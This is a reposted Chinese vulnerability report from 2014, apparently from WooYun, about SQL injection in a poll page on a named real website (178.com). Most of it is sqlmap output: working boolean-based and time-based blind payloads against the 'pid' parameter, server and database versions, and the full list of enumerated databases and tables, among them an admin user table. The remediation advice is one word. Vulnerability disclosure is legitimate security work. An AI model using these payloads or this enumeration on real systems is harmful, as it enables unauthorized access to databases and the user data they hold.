记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

178某站SQL注入漏洞

2014-08-31 12:10

注入:

http://poll.178.com:80//post_poll.php?pid=2628 (POST)



vid=2628&vkey[]=20458&submit=





sqlmap identified the following injection points with a total of 684 HTTP(s) requests:

---

Place: GET

Parameter: pid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: pid=2628 AND 4930=4930



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: pid=2628 AND SLEEP(5)

---

web application technology: Nginx, PHP 5.2.17

back-end DBMS: MySQL 5.0.11

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: pid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: pid=2628 AND 4930=4930



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: pid=2628 AND SLEEP(5)

---

web application technology: Nginx, PHP 5.2.17

back-end DBMS: MySQL 5.0.11

available databases [4]:

[*] information_schema

[*] poll

[*] poll_new

[*] test





Database: poll_new

[22 tables]

+---------------------------------------+

| act_body |

| act_key |

| act_userinfo |

| act_userlog |

| poll_cache |

| poll_contentcategory |

| poll_contributiveness_body |

| poll_contributiveness_cate |

| poll_contributiveness_key |

| poll_contributiveness_log |

| poll_contributiveness_tag_info |

| poll_fabu_link |

| poll_key |

| poll_record |

| poll_user_field |

| poll_usergroup |

| poll_vadminuser |

| poll_vbody |

| poll_vcategory |

| poll_vkey |

| poll_vlogs |

| poll_vmod |

+---------------------------------------+



Database: poll

[30 tables]

+---------------------------------------+

| act_body |

| act_key |

| act_userinfo |

| act_userlog |

| annual |

| poll_body |

| poll_cache |

| poll_contentcategory |

| poll_contributiveness_body |

| poll_contributiveness_cate |

| poll_contributiveness_key |

| poll_contributiveness_log |

| poll_contributiveness_tag_info |

| poll_fabu_link |

| poll_fields |

| poll_fkey_info |

| poll_key |

| poll_key_extra |

| poll_logs |

| poll_record |

| poll_user_field |

| poll_user_fields |

| poll_user_log |

| poll_usergroup |

| poll_vadminuser |

| poll_vbody |

| poll_vcategory |

| poll_vkey |

| poll_vlogs |

| poll_vmod |

+---------------------------------------+



Database: information_schema

[37 tables]

+---------------------------------------+

| CHARACTER_SETS |

| COLLATIONS |

| COLLATION_CHARACTER_SET_APPLICABILITY |

| COLUMNS |

| COLUMN_PRIVILEGES |

| ENGINES |

| EVENTS |

| FILES |

| GLOBAL_STATUS |

| GLOBAL_VARIABLES |

| INNODB_CMP |

| INNODB_CMPMEM |

| INNODB_CMPMEM_RESET |

| INNODB_CMP_RESET |

| INNODB_LOCKS |

| INNODB_LOCK_WAITS |

| INNODB_TRX |

| KEY_COLUMN_USAGE |

| PARAMETERS |

| PARTITIONS |

| PLUGINS |

| PROCESSLIST |

| PROFILING |

| REFERENTIAL_CONSTRAINTS |

| ROUTINES |

| SCHEMATA |

| SCHEMA_PRIVILEGES |

| SESSION_STATUS |

| SESSION_VARIABLES |

| STATISTICS |

| TABLES |

| TABLESPACES |

| TABLE_CONSTRAINTS |

| TABLE_PRIVILEGES |

| TRIGGERS |

| USER_PRIVILEGES |

| VIEWS |

+---------------------------------------+

漏洞证明:

fe.png

修复方案:

过滤,其实你们站点注入还不少,认真找找能找到不少呢。

知识来源: www.wooyun.org/bugs/wooyun-2014-068826

阅读:64924 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“178某站SQL注入漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云